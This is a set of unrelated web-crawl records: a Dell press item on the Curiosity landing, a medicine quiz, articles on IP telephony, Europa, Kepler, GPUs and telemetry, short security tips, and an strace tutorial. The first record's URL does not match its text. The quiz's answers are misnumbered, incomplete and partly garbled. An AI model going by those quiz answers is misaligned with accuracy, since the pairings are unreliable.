<urn:uuid:e58d26ac-daef-4426-974b-07ff86c6c30f>
CC-MAIN-2017-09
http://www.darkreading.com/vulnerabilities-and-threats/3-web-security-takeaways-from-wikipedias-near-miss/d/d-id/1113772?piddl_msgorder=thrd
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172783.57/warc/CC-MAIN-20170219104612-00247-ip-10-171-10-108.ec2.internal.warc.gz
en
0.908239
830
2.796875
3
NASA Mars Rover Landing Empowered by Dell SystemsBy CIOinsight | Posted 08-07-2012 Dell announced that its systems supported the landing of NASA's new Mars rover, Curiosity. Dell systems played a key role in the most complicated portion of the mission, with data analysis conducted in two NASA High Performance Computing (HPC) clusters running Dell PowerEdge servers. Managed by NASA's Jet Propulsion Laboratory (JPL) in Pasadena, California, the Mars rover, Curiosity, is the largest rover ever sent to explore the Red Planet. Launched on Nov. 26, 2011, Curiosity landed on the Red Planet at 10:32 p.m. Pacific Daylight Time on Aug. 5, 2012 near the base of a mountain inside the Gale Crater near the Martian equator. Researchers plan to use Curiosity to study the mountain s layers which hold evidence about the wet environments of early Mars and may hold clues about whether the planet ever offered conditions favorable for life. The rolling laboratory will search for two things: environments where life might have existed, and the capacity of those environments to preserve evidence of past life. "We're proud to work hand-in-hand with NASA, a true American institution that provides the world with the understanding that modern day pioneering delivers optimism and the drive to go further," said Jere Carroll, general manager civilian for agencies at Dell Federal, in a statement. "This notion echoes Dell's mission to provide customers with a full spectrum of IT hardware and services, helping them to accomplish their mission more effectively and efficiently. Most importantly, we are honored to be able to test and validate this mission s most critical portion, landing on the Red Planet." JPL's Dell HPC clusters, Galaxy and Nebula, provided vital support to NASA's Curiosity rover in analyzing the vast amounts of test data needed to correctly prepare the rover for entering the Martian atmosphere and landing it on the planet. This difficult task was powered by Dell PowerEdge servers that make up the Galaxy and Nebula clusters. The final landing sequence parameters developed by the mission team, which was tested and validated using the Dell HPC clusters, were uploaded last week to Curiosity, Dell officials said. NASA officials said Curiosity's main assignment is to investigate whether its study area ever has offered environmental conditions favorable for microbial life. To do that, it packs a science payload weighing 15 times as much as the science instruments on previous Mars rovers. The landing target, an area about 12 miles by 4 miles (20 kilometers by 7 kilometers), sits in a safely flat area between less-safe slopes of the rim of Gale Crater and the crater's central peak, informally called Mount Sharp. The target was plotted to be within driving distance of layers on Mount Sharp, where minerals that formed in water have been seen from orbit, NASA said. With the successful landing, the 1-ton rover's two-year prime mission on the surface of Mars has begun. However, one of the rover's 10 science instruments, the Radiation Assessment Detector (RAD), already has logged 221 days collecting data since the spacecraft was launched on its trip to Mars last November. To read the original eWeek article, click here: NASA Mars Rover Landing Empowered by Dell Systems
<urn:uuid:e53a83dd-3d79-4223-9bec-9f0b3d131af7>
CC-MAIN-2017-09
http://www.cioinsight.com/print/c/a/Latest-News/NASA-Mars-Rover-Landing-Empowered-by-Dell-Systems-413134
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169769.33/warc/CC-MAIN-20170219104609-00016-ip-10-171-10-108.ec2.internal.warc.gz
en
0.936541
657
2.859375
3
Medicine and Health - Quiz Questions & Answers - What do you call the Chinese system of healing with insertions of needles into the body? - Which British biochemist first found the presence of vitamins in fresh food? - (a) What oil is sometimes applied to gums and teeth to relieve pain? (b) What is the name of the drug or preparation used to induce vomiting, especially in food-poisoning? - What is the difference between an artery and a vein? - Match the following with their particular fields: (a) Joseph Lister - Blood circulation (b) Alexander Fleming - Bacteriology (c) Christian Barnard - Antiseptic surgery (d) William Harvey - Penicillin (e) Louis Pasteur - Heart transplant - (a) Who is a Hypochondriac? (b) Give one word for the time of compulsory isolation to prevent the spread of infection or contagion. - (a) What do you suffer from if you have Halitosis? (b) What is the common name for Hypertension? - (a) What are the four major blood types? (b) In which part of the body are blood cells manufactured? - What do the following stand for? - (a) Who is regarded as the ‘Father of Plastic Surgery’? (b) What is Homoeopathy? - (a) Where would you find the medulla oblongata? (b) Which organ contains the Islets of Langerhans? - (a) What is the medical name for Lockjaw? (b) What is the medical name for Cancer of the Blood? - What do the following specialize in: - What are these (a) goose bumps (b) funny bone (c) writer’s finger - What is considered to be (a) the normal temperature of the human body (b) the pulse rate of a healthy adult - Which is (a) the largest bone in the human body? (b) the smallest bone in the human body? - What is the name given to the AIDS virus? - (a) To which bone is the tongue attached? (b) What substance must mix with food to give taste? (c) What are you if you are short-sighted? - For what is Sir Jonas Salk credited? - Curing kidney stones without surgery has become possible in recent times. What is the name of the new method which uses certain waves to smash kidney stones? Answers of Quiz Questions about Medicine & Health - Sir Frederick Gowland Hopkins - (a) Oil of cloves (b) An emetic - An artery carries blood from the heart, while a vein conveys blood back to the heart - (a) Joseph Lister - Antiseptic surgery (b) Alexander Fleming - Penicillin (c) Christian Barnard - Heart transplant (d) William Harvey - Blood circulation (e) Louis Pasteur - Bacteriology - (a) a person who continually imagines he is ill - (a) bad breath (b) high blood pressure - (a) A, B, AB, O (b) The bone-marrow - (a) Electro Cardiogram (b) Electro Convulsive Therapy - (a) Susruta, the ancient Indian man of medicine (b) Treatment of disease would produce symptoms of the disease. - (a) In the brain (b) The Pancreas - (a) Tetanus - (a) Study of skull features (b) diseases of old age (c) Care and treatment of infants and children (d) a specialist in the treatment of problems concerning the position of the teeth and jaws. (e) X-rays body parts and organs for diagnosis - (a) Tiny muscles under the skin’s surface which contract and make the hairs stand up, causing small bumps. (b) The spot on the back of the elbow where the ulna nerve rests against the humerus bone (c) A callus or hardening of the skin caused by constant pressure from holding a pen or pencil - (a) 98.4F (b) 70-80 beats - (a) the femur or thigh bone (b) the stirrup or stapes in the ear - HIV (Human Immunodeficiency Virus) - (a) The hyoid bone - For introducing a vaccine against Poliomyelitis in 1954. This list is based on the content of the title and/or content of the article displayed above which makes them more relevant and more likely to be of interest to you. We're glad you have chosen to leave a comment. Please keep in mind that all comments are moderated according to our comment policy, and all links are nofollow. Do not use keywords in the name field. Let's have a personal and meaningful conversation.comments powered by Disqus
<urn:uuid:eb79435f-367a-4ed4-a94f-42040525d9f1>
CC-MAIN-2017-09
http://www.knowledgepublisher.com/article-732.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169769.33/warc/CC-MAIN-20170219104609-00016-ip-10-171-10-108.ec2.internal.warc.gz
en
0.877093
1,078
2.609375
3
Ten years ago, if you went to pick up a phone call, your voice would have been carried across the same copper-wire technology that powered America’s very first telephone system. Today? With recent advances, at least some of your call would be routed through pipes that also carry Internet traffic. This new way of handling phone conversation is mostly invisible, and it’s unlikely to make a huge difference in the way we actually place a call. But for a small share of Americans, the change could help them catch up to a new economy that’s largely left them behind. What does a revamped telephone backbone have to do with lifting people’s fortunes? It begins with a nationwide movement to replace the country’s ancient phone infrastructure with one that runs primarily on fiberoptic cables. Recall the last decade, when the country moved from analog to all-digital television. What’s happening now in telephony is a lot like that, only customers won’t have to lift a finger to experience its benefits. Here’s how it works: Fiberoptic cables are super-efficient at transferring large amounts of data quickly; it’s the reason why Verizon can say its FiOS service is capable of downloading a feature-length HD movie to your computer in two minutes, less than the time it takes to microwave your popcorn. What the switch to Internet-protocol telephony does is move voice traffic onto those fiberoptic cables, and in so doing, make telephone calls indistinguishable from Internet traffic. Pretty soon -- telecom experts believe the all-IP transition will be complete by 2018 -- an ordinary phone call will work in much the same way that calls over Skype or Google Voice do now. “Voice is becoming just another application riding over the Internet backbone,” said FCC commissioner Ajit Pai at a Q&A session in Washington last week. Instead of the divide we’re used to between voice and data, voice is simply going to become a form of data. Whether they realize it or not, many Americans already use this system. In fact, Pai said, less than one-third of the country still subscribes to what the industry colloquially calls POTS, or plain old telephone service. In some ways, “all-IP” is simply a codeword for putting POTS out to pasture. As companies move more of their voice traffic onto high-speed fiberoptic networks, what bandwidth is left over will become conveniently available to thousands or perhaps millions who’ve never had access to high-speed Internet before. The expansion would be a boon to distant and disadvantaged parts of the country, where traditional Internet providers once balked at the cost of building to the last mile. It’s still expensive to rip up copper cables and replace them with fiber. But it’s much less expensive to do it as an upgrade to a system everyone already has rather than to build something out of nothing. You aren’t going to wake up one morning and find every home connected to Verizon FiOS. In fact, even after the IP transition, many houses are still going to be connected to their local switch by copper. But what’s connecting the switch to the rest of the world will be fiber -- and overall, that’ll boost Internet bandwidth considerably, according to executives at Frontier Communications, a telephone company that serves mainly rural and small communities in the United States. “We’re just starting to understand the benefits that are out there,” said Jennifer Schneider, Frontier’s vice president for legislative affairs. “I don’t know that we can quantify it right now.” That hasn’t stopped some from trying. One approach taken by recent studies is to assess what’s called “consumer surplus,” or the gap between the highest price someone is willing to pay for a good and what they actually paid for it. When it comes to online tools such as e-mail, it turns out people are open to shelling out quite a bit -- even if the product is provided to them for free. “On average,” reported The Economist, “households would pay €38 ($50) a month each for services they now get free. After subtracting the costs associated with intrusive ads and forgone privacy, McKinsey reckoned free ad-supported Internet services generated €32 billion of consumer surplus in America and and €69 billion in Europe.” There are other ways to think about consumer surplus, The Economist added. Think of all the poking around in the Dewey decimal system you no longer have to do, thanks to online search engines. The search industry alone generates between $65 billion and $150 billion in time savings nationally every year, according to the report. While wealthy America has surged ahead, in some cases creating whole new economies online and virtual currencies to use within them, those without broadband have been shut out and unable to participate even if they wanted to. Americans in rural and underprivileged areas would almost surely benefit from these consumer surpluses, just as the rest of us have. It’s hard to say how a lack of broadband access may have actually held back economic development in these places. But we do know that a digital divide is alive and well in the United States. While the broadband penetration rate tops 90 percent among households making over $50,000 a year, that figure drops to 68 percent for homes bringing in $30,000-$50,000 a year, and to less than half in households making under $30,000. Now let’s look at the problem geographically. Two percent of respondents to a survey conducted by the Leichtman Research Group said broadband simply wasn’t available in their area. Of that group, a majority said they’d buy a high-speed subscription if they could. Overall, about two-thirds of a percent said they wanted to get broadband but couldn’t afford it. Two percent of America doesn’t sound like a lot. But it’s actually about 6 million people -- more than the population of Los Angeles, the second-largest city in the United States. Imagine if LA and its surroundings suddenly dropped off the face of the Web and couldn’t get back on. The transition to all-IP telephony should help close the digital divide for some of the country’s neediest. It may not make a huge difference right away or even within a few years. But if the trajectory of these Americans resembles anything like that of their urban counterparts, we might expect great things from them.
<urn:uuid:e3f2487e-124c-482d-8f25-0dd339603b0d>
CC-MAIN-2017-09
http://www.nextgov.com/emerging-tech/2013/03/how-humble-telephone-about-bring-internet-masses-again/61811/?oref=ng-dropdown
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170569.99/warc/CC-MAIN-20170219104610-00192-ip-10-171-10-108.ec2.internal.warc.gz
en
0.951197
1,373
2.578125
3
Thinking there could be life on one of Jupiter's moons, NASA scientists are working on a plan to send robots to try and find out. Thinking there could be life on one of Jupiter's moons, NASA scientists are working on a plan to send robots to begin studying it. Jim Green, NASA's planetary science chief, said there's no reason to think there isn't life on Europa, the sixth-closest moon to the planet Jupiter and the sixth-largest moon in the solar system. And he can't wait to find out. NASA administrator Charles Bolden said this week that the space agency's 2015 proposed budget includes funding for a robotic mission to Europa. Green noted that NASA hopes to launch the first of a series of robotic missions to Europa in the mid 2020s. "We've been thinking about Europa for quite a few years. Then in December things had to change," Green told Computerworld. "The ocean there is protected by an ice shell and there's no reason that we believe life couldn't have been generated on Europa. The real search for aliens is in this solar system. To determine if life exists outside the bounds of Earth's gravity, it's really in places like Mars and Europa and maybe Titan." If NASA does find life -- whether it's microbial or other life forms -- that will have major repercussions on what we expect about life outside the bounds of Earth. "If we can find life there, either past life or current life, then that tells us life has to be everywhere in this galaxy," said Green. "It's an extreme environment, but not as extreme as we think. It's in a temperature range that life, as we know it, is abundant but does it have the right chemicals to create life and feed life? There's no reason to think that the evolution of life in that environment didn't just take off." In December, the Hubble Space Telescope spotted a huge water plume emanating from the south pole of Europa. Green said it wasn't a small geyser like Old Faithful in Yellowstone National Park, which shoots up 90 to 180 feet in the air. The geyser coming off Europa shoots up more than 124 miles. Green explained that Europa is covered by an ice shell. However, the strong tidal pull from Jupiter has melted some of that ice and created a deep ocean below it. Europa's ocean, which has hydro thermal vents, is about 62 miles deep and covers the entire moon. That's about 10 times deeper than the ocean here on Earth and it holds twice as much water than is found here. "It's a really dynamic region," said Green. "It's a fabulous water world. We believe life probably started in water on this planet. Having billions of years of water on Europa, tells us there's a good chance there's life on Europa now." It's not clear what NASA will first send to Europa. It could be a spacecraft similar to Cassini that will repeatedly fly past the moon, sending back information about it. However, the first mission also could be a spacecraft that will go into orbit around Europa, studying its surface, the geyser and gases. After that mission, whatever it might entail, sends back data, NASA will send another robot -- one that will likely land on Europa's ice shell. "We're in the process of studying it," said Green. "Now that we're seeing the plumes, we have new ideas we never had before. We're in the pre-formulation phase. We're bringing the ideas together and figuring out what that first mission might be. There'll be a series of robotic missions." Using current rocket technology, it would probably take eight to nine years for a spacecraft to reach Europa. However, if NASA uses one of the new heavy-lift rockets it's been working on, that trip could be shortened to two years. NASA scientists speculate there might be life currently on Europa and are planning the first of a series of robotic missions to study Jupiters moon. Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is firstname.lastname@example.org. Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center. This story, "NASA will send a robot to investigate suspected life on Europa" was originally published by Computerworld.
<urn:uuid:bd068baa-d9de-4755-849b-ae1cf4434f94>
CC-MAIN-2017-09
http://www.networkworld.com/article/2175019/data-center/nasa-will-send-a-robot-to-investigate-suspected-life-on-europa.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00068-ip-10-171-10-108.ec2.internal.warc.gz
en
0.958295
928
3.46875
3
Telemetry is the automated communications process by which measurements are made and data collected at remote points. The data is then transmitted to receiving equipment for monitoring. The word ‘telemetry’ is derived from Greek roots: tele = remote, and metron = measure. Telemetry is not a new concept, that’s for sure. We’ve been watching telemetry at work for decades. For example, we’ve strapped transmitters onto migrating animals, weather buoys, seismic monitoring, etc.. However, the use of telemetry continues to accelerate, and this technology will bring up huge challenges to those of us responsible for data collection, data integration, and data analysis. The most recent rise of telemetry is around the use of new and inexpensive devices that we now employ to gather all kinds of data. These can range from Fit Bits that seem to be attached to everyone these days to count the steps we take, to smart thermostats that monitor temperature and humidity, to information kicked off by our automobiles as to the health of engine. The rise of the “Internet of Things” is part of this as well. This is a buzzword invention of an industry looking to put a name to the rapid appearance of many devices that can produce data, as well as the ability of these devices to self-analyze and thus self-correct. MRI machines in hospitals, robots on factory floors, as well as motion sensors that record employee activity are just a few of the things that are now spinning off megabytes of data each day. Typically, this type of information flows out of devices as streams of unstructured data. In some cases, the data is persisted at the device, and some cases not. In any event, the information needs to be collected, put into an appropriate structure for storage, perhaps combined with other data, and stored in a transactional database. From there, the data can be further transferred to an analytics-oriented database, or analyzed in place. Problems arise when it comes time to deal with that information. Obviously, data integration is critical to most telemetry operations. The information must be managed from point-to-point, and then persisted within transitional or analytics databases. While this is certainly something we’ve done for some time, the volume of information that these remote devices spin off is new, and thus we have a rising need to effectively manage a rising volume of data. Take the case of the new health telemetry devices that are coming onto the market. They can monitor most of our vitals, including blood pressure, respiration, oxygen saturation, and heart rate, at sub-second intervals. These sensors typically transmit the data to a smart phone, where the information is formatted for transfer to a remote database, typically in the cloud. The value of this data is very high. By gathering this data over time, and running analytics against known data patterns, we can determine the true path of our health. Perhaps we will be able to spot a heart attack or other major health issues before they actually happen. Or, this information could lead to better treatment and outcome data, considering that the symptoms, treatment, and outcomes will now be closely monitored over a span of years. While the amount of data was relatively reasonable in the past, the number of data points and the frequency of collection are exploding. It’s imperative that we figure out the best path to data integration for the expanding use of telemetry. A few needs are certain: - The need to gather information for hundreds, perhaps thousands of data points/devices at the same time. Thus, we have to identify the source of the data, as well as how the data should be managed in-flight, and when stored at a target. - The need to deal with megabytes, perhaps gigabytes of data per hour coming off a single device, where once it was only a few kilobytes. Given the expanding number of devices (our previous point), the math is easy. The amount of data that needs to be transmitted and processed is exploding. - The massive amounts of data will drive some data governance and data quality issues that must be addressed at the data integration layer. Data is typically not validated when it’s generated by a device, but it must be checked at some point. Moreover, the complexity of these systems means that the use of data governance approaches and technology is an imperative. This is exciting stuff, if you ask me. We’re learning to gather the right data, at greater volumes, and leverage that data for more valuable outcomes. This data state has been the objective for years, but it was never really obtainable. Today’s telemetry advances mean we have a great opportunity in front of us.
<urn:uuid:c2cb56af-1d0a-417c-a419-345f2c91b415>
CC-MAIN-2017-09
http://www.actian.com/about-us/blog/data-challenges-telemetry/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00596-ip-10-171-10-108.ec2.internal.warc.gz
en
0.953946
976
3.125
3
New Threats Leave Less Room for Error As the number of broadband users increases, the ripple effect of any security vulnerability becomes much greater. Combine that with a wide array of new virtual threats, and you have a much more susceptible IT environment, said David Redekop, co-founder of Nerds On-Site, a kind of brain trust for assisting enterprises and individual consumers with IT products and concepts. “We used to have reasonably big windows when a security vulnerability was discovered,” he said. “We would find out about it and say, ‘That’s a bit of risk for our customers. We should plan on patching that system.’ As the number of broadband users—and potentially malicious users—grows, those windows are getting smaller and smaller.” Although it used to be acceptable to employ a reactive, patch-as-you-go strategy, information security professionals have to take more preventative measures today. “You can no longer assume that you’re going to get a warning, and you can patch it and then you’re safe,” Redekop said. “You have to assume that by the time you’ve been warned, that particular exploit has been tested on your network by some zombie or some hacker. All of a sudden, we have to put big fences around our (network), and additional fences just in case there are some holes we weren’t aware of.” Redekop recommends using reverse firewalls to cut down on spam and prevent malware from slipping in and out through back doors. “A reverse firewall virtually inspects any computer’s outbound request,” he said. “Spam is sent out by some piece of spyware on the users’ computers that helps the spammers’ cause by sending out masses of e-mails. A reverse firewall implementation (ensures) computers on a network can only send mail through a server, which inspects for viruses and spam. It’s an easy implementation, and it can be done on any professional-grade router.” Users also need to be aware of the vulnerability of information sent through wireless networks or in public hot spots. Part of the problem is that more than 90 percent of users still use clear-text e-mail in all situations, Redekop said. Hackers use Cain-and-Abel programs to pick up traffic in exposed areas like this, and can intercept user names and passwords relatively easily. To avoid compromising sensitive information, he suggests using at least some level of encryption to send and receive e-mail. For more information, see http://www.nerdsonsite.us.
<urn:uuid:d4c2a870-3db0-44e6-a7f3-b85499fb1871>
CC-MAIN-2017-09
http://certmag.com/new-threats-leave-less-room-for-error-expert-says/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174215.11/warc/CC-MAIN-20170219104614-00120-ip-10-171-10-108.ec2.internal.warc.gz
en
0.939458
561
2.53125
3
strace - trace system calls and signals strace [ -dffhiqrtttTvxx ] [ -acolumn ] [ -eexpr ] ... [ -ofile ] [ -ppid ] ... [ -sstrsize ] [ -uusername ] [ -Evar=val ] ... [ -Evar ] ... [ command [ arg ... ] ] strace -c [ -eexpr ] ... [ -Ooverhead ] [ -Ssortby ] [ command [ arg ... ] ] In the simplest case strace runs the specified command until it exits. It intercepts and records the system calls which are called by a process and the signals which are received by a process. The name of each system call, its arguments and its return value are printed on standard error or to the file specified with the -o option. So as the above man page excerpt suggests, this article is going to be about strace, how you can utilize it, and when it can used. Before proceeding with any additional information, the best thing to do at this point is to simply use strace, get a feel for the output, and start analyzing its output so that you understand the information that is being printed to the screen. Here is an easy example to run a strace on the parent apache process on a CentOS installation: strace -p´cat /var/run/httpd.pid´ Assuming this is the first strace command you have run, lets take a moment and analyze it. The first and most obvious would be the command itself, followed by the "-p" switch. The "-p" switch tell's strace that you want to trace a processs id. In this case we are getting the process id from a lock file, however this can also be manually typed in such as: Now you may or may not immediately see output. If the process is in a "sleeping" or "waiting" status, waiting to be utilized there may not be any data printed to the screen in which case you may need to wait a moment, or verify the process id you are trying to attach to. To detach press CTRL+C So by now you should see that strace can provide a wealth of data about what a process is currently doing. Unfortunately there is no "easy" way to jump into using strace due to the massive amount of data it can provide, so this section will provide you with some examples which you can re-create on your own server to demonstrate how it can be used. For this example we are simply using apache. We will know why its broken, and a normal apache restart would also tell you why it is broken, however this example is to demonstrate how you could utilize strace to identify a similar problem, but on software not specificly pin pointing the problem, or providing a convoluted error code. With that said follow these steps (DO NOT FOLLOW THESE UNLESS YOU ARE ON YOUR OWN SERVER, OR A TESTING ENVIRONMENT!!!) [root@dev ~]# cd /tmp [root@dev tmp]# mv /etc/httpd/conf/httpd.conf /etc/httpd/conf/httpd.conf.bak [root@dev tmp]# strace /etc/init.d/httpd restart Now within the information that was printed on your screen, you should find a line that looks like this: waitpid(-1, httpd: Could not open configuration file /etc/httpd/conf/httpd.conf: No such file or directory The error shown above is pretty obvious in terms of what the underlying problem would be, however information like this, as minor as it may be can help save you hours of work. Additional messages you may see here are ones reflecting "permission denied", "Inappropriate ioctl for device", and "No such file or directory". These will be very common in various software distributions such as apache, MySQL, vsftpd and so forth which can make some of the information a bit confusing. Keep in mind that on a linux system, if software fails it generally quits where its at. With that said, the information you are normally looking for is printed right before the strace stops. The easiest way to look for errors is by reading through the data, and looking for "-1" which is your error indicator. "0" would indicate a success. Keep in mind that strace will not always provide you useful information for every problem, however it can help you determine what the software is doing in the background which may assist you in troubleshooting / debugging a problem. Options and Examples The following "switches" and examples are ones that I would personally suggest, and use. Along with them are excerpts from the strace man page. -f Trace child processes as they are created by currently traced processes as a result of the fork(2) system call -ff If the -o filename option is in effect, each processes trace is written to filename.pid where pid is the numeric process id of each process. This is incompatible with -c, since no per-process counts are kept. -v Print unabbreviated versions of environment, stat, termios, etc. calls. These structures are very common in calls and so the default behavior displays a reasonable subset of structure members. Use this option to get all of the details -o Write the trace output to the file filename rather than to stderr. Use filename.pid if -ff is used. If the argument begins with ‘|’ or with ‘!’ then the rest of the argument is treated as a command and all output is piped to it. This is convenient for piping the debugging output to a program without affecting the redirections of executed programs. strace process id from pid file: strace -p´cat /var/run/file.pid´ strace a process id and output to a file strace -p12345 -o /tmp/filename.txt strace a process and follow all forks strace -ff -p12345 combining all of the above strace -ff -o /tmp/outfile.txt -p´cat /var/run/httpd.pid´ Hopefully by now you have a pretty solid basic understanding on how to use strace, and how it can be beneficial in saving you time, and effort when it comes to troubleshooting an issue that is consuming your time. Again strace will not always provide you with the information you need, however when you are running out of idea's or options, it is a great tool to turn to. To become more versed in utilizing strace, get familiar with its options, and how to correctly use them, and understand the information they provide you, and of course.. use it. The best way to become good at something is to practice.
<urn:uuid:dc7f4d02-62a1-46f3-a93a-0ab966b40515>
CC-MAIN-2017-09
http://www.codero.com/knowledge-base/content/36/192/en/introduction-to-strace.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00364-ip-10-171-10-108.ec2.internal.warc.gz
en
0.920083
1,450
2.703125
3
While computer gamers are eagerly awaiting the next generation of platforms, the computer scientists of Lawrence Livermore's Graphics Architectures for Intelligence Applications (GAIA) project are tracking the rapidly changing technology, but for a different reason. A team, led by John Johnson of the Computation Directorate, is researching graphics processing units (GPUs)the highly specialized, low-cost, rendering engines at the heart of the gaming industryto determine how they might be programmed and used in applications other than virtual entertainment. “Graphics processors are accelerating in performance much faster than other microprocessors,” says Sheila Vaidya, project leader for GAIA. “We have an opportunity to ride the wave of innovations driving the gaming industry.” These processors — traditionally designed for fast rendering of visual simulations, virtual reality, and computer gaming — could provide efficient solutions to some of the most challenging computing needs facing the intelligence and military communities. Real-time data-processing capabilities are needed for applications ranging from text and speech processing to image analysis for automated targeting and tracking. Gaming the System The GAIA team, including collaborators from Stanford University, the University of California at Berkeley and Davis, and Mississippi State University, is researching graphics processors used in the computer gaming and entertainment industries to determine how they might be used in knowledge-discovery applications of relevance to national security. Why bother with this class of processors when plenty of central processing units (CPUs) exist to do the heavy-duty work in high-performance computing? Two words: speed and cost. The ever-growing appetite in the three-dimensional (3D) interactive gaming community has led to the development and enhancement of GPUs at a rate faster than the performance of conventional microprocessors predicted by Moore's Law. This acceleration in improved performance will likely continue as long as the demand exists and integrated-circuit technologies continue to scale. During the past 2 years, the GAIA team has implemented many algorithms on current-generation CPUs and GPUs to compare their performance. The benchmarks that followed showed amazing performance gains of one to two orders of magnitude on GPUs for a variety of applications, such as georegistration, hyperspectral imaging, speech recognition, image processing, bioinformatics, and seismic exploration. GPUs have a number of features that make them attractive for both image- and data-processing applications. For example, they are designed to exploit the highly parallel nature of graphics-rendering algorithms, and they efficiently use the hundreds of processing units available on-chip for parallel computing. Thus, one operation can be simultaneously performed on multiple data sets in an architecture known as single-instruction, multiple data (SIMD), providing extremely high-performance arithmetic capabilities for specific classes of applications. Current high-end GPU chips can handle up to 24 pipelines of data per chip and perform hundreds of billions of operations per second. Today's commercial GPUs are relatively inexpensive as well. “National retailers charge a few hundred dollars for one, compared to the thousands of dollars or more that a custom-built coprocessor might cost,” says Johnson. The performance of these GPUs is impressive when compared with that of even the newest CPUs. “A modern CPU performs about 25 billion floating-point operations per second,” says Johnson. “Whereas a leading-edge GPU, such as the NVIDIA GeForce 7800 GTX video card or the upcoming successor to the ATI Radeon X850, performs six times faster at half the cost of a CPU.” These GPUs are optimized for calculating the floating-point arithmetic associated with 3D graphics and for performing large numbers of operations simultaneously. GPUs also feature a high on-chip memory bandwidth, that is, a large data-carrying capacity, and have begun to support more advanced instructions used in general-purpose computing. When combined with conventional CPUs and some artful programming, these devices could be used for a variety of high-throughput applications. “GPUs work well on problems that can be broken down into many small, independent tasks,” explains GAIA team member Dave Bremer. Each task in the problem is matched with a pixel in an output image. A short program is loaded into the GPU, which is executed once for every pixel drawn, and the results from each execution are stored in an image. As the image is being drawn, many tasks are being executed simultaneously through the GPU's numerous pipelines. Finally, the results of the problem are copied back to an adjacent CPU. However, general-purpose programming on GPUs still poses significant challenges. Because the tasks performed on a GPU occur in an order that is not controlled by a programmer, no one task can depend on the results of a previous one, and tasks cannot write to the same memory. Consequently, image convolution operations work extremely well (100 times faster) because output pixels are computed independently, but computing a global sum becomes very complex because there is no shared memory. “Data must be copied in and out of the GPU over a relatively slow transmission path,” says GAIA team member Jeremy Meredith. “As a result, memory-intensive computations that require arbitrary access to large amounts of memory off-chip are not well suited to the GPU architecture.” Today's GPUs are power hungry. But designers, faced with the growing demand for mobile computing, are rapidly evolving chip architectures to develop low-power versions that will approach the performance of high-end workstations. What's in the Pipeline “GPUs are beginning to more closely resemble CPUs with every evolution,” notes Johnson. “The drawbacks for general-purpose programming are being tackled by the industry, one by one.” Next-generation CPU architectures are adopting many features from GPUs. “Emerging architectural designs such as those found in Stanford's Merrimac and the IBM-Toshiba-Sony Cell processor look similar to the architecture of GPUs,” says Johnson. “These designs could be the next-generation technology for real-time, data-processing applications. Our work with GPUs will help us evaluate and deploy the emerging devices.” The Cell processor, which is a crossover GPU-CPU chip, is scheduled to hit the gaming market soon. But the Cell might also prove to be useful in defense and security computing environments. The scientists of GAIA — just like the gamers — are eager to test and scale its limits. Credit must be given to the University of California, Lawrence Livermore National Laboratory, and the Department of Energy under whose auspices the work was performed, when this information or a reproduction of it is used.
<urn:uuid:13a00c99-22d1-4a91-92c3-f8fee5fb82fb>
CC-MAIN-2017-09
https://www.hpcwire.com/2005/12/16/built_for_speed-1/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00364-ip-10-171-10-108.ec2.internal.warc.gz
en
0.93927
1,354
2.875
3
spinning out of control, the Kepler Space Telescope is using the power of the sun to continue its search for Earth-like planets. NASA announced that it even though the space telescope is down from four to two working wheels, the agency has approved a plan that will keep Kepler working for at least another two years. This newly reconfigured mission has been dubbed K2. The telescope, launched in 2009, lost the use of one of the four wheels that control its orientation in space in May 2013. That was the telescope's second wheel failure. With the loss of the second wheel, NASA could no longer manipulate the telescope's positioning and ground engineers struggled to communicate with it since the communications link went in and out as the spacecraft spun uncontrollably. Several months later, NASA engineers reported that they were unable to get the two disabled wheels working properly again so Kepler would be unable to continue its original planet-hunting mission. At that point, NASA was working to figure out what other scientific research -- like searching for asteroids, comets or supernovas -- Kepler could do in its diminished capacity. However, scientists came up with a way to keep the telescope focused on its original planet-hunting mission. Engineers, according to NASA, discovered they could use the sun's radiation pressure to actually balance the telescope in space. Protons of sunlight exert pressure on the spacecraft, NASA explained. If the telescope is positioned exactly, it can be balanced against the pressure like a pencil can be balanced on your finger. That means the telescope can be positioned without the use of the two damaged wheels. The spacecraft will be rotated periodically to prevent sunlight from affecting the telescope lens. The spacecraft will be able to focus on a specific part of the sky for about 83 days. After that point, the telescope will be rotated to protect the telescope from the sun. NASA expects Kepler to complete four of these studies every year. The first K2 science observation is set to begin May 30. The new mission comes with two years of funding to continue the hunt for Earth-like exoplanets. However, it also calls for Kepler to observe notable star clusters, young and old stars, active galaxies and supernovae. Even if Kepler had not been able to get back to work, William Borucki, the Kepler mission's principal science investigator, noted last year that the space telescope had already sent back enough data to keep scientists busy for another two to three years. "The Kepler mission has been spectacularly successful," Borucki said. "With the completion of Kepler observations, we know the universe is full of Earth-like planets.... The most exciting discoveries are going to come in the next few years as we analyze this data." He added that he expected that within two years scientists should be able to answer the question of whether Earth is unique or a common kind of planet in our galaxy. Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed . Her email address is email@example.com.
<urn:uuid:107e7ca4-1866-40bc-9395-dc22fd057de7>
CC-MAIN-2017-09
http://www.computerworld.com/article/2489602/emerging-technology/nasa-uses-solar-power-to-get-crippled-kepler-back-to-work.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00240-ip-10-171-10-108.ec2.internal.warc.gz
en
0.95347
651
3.625
4
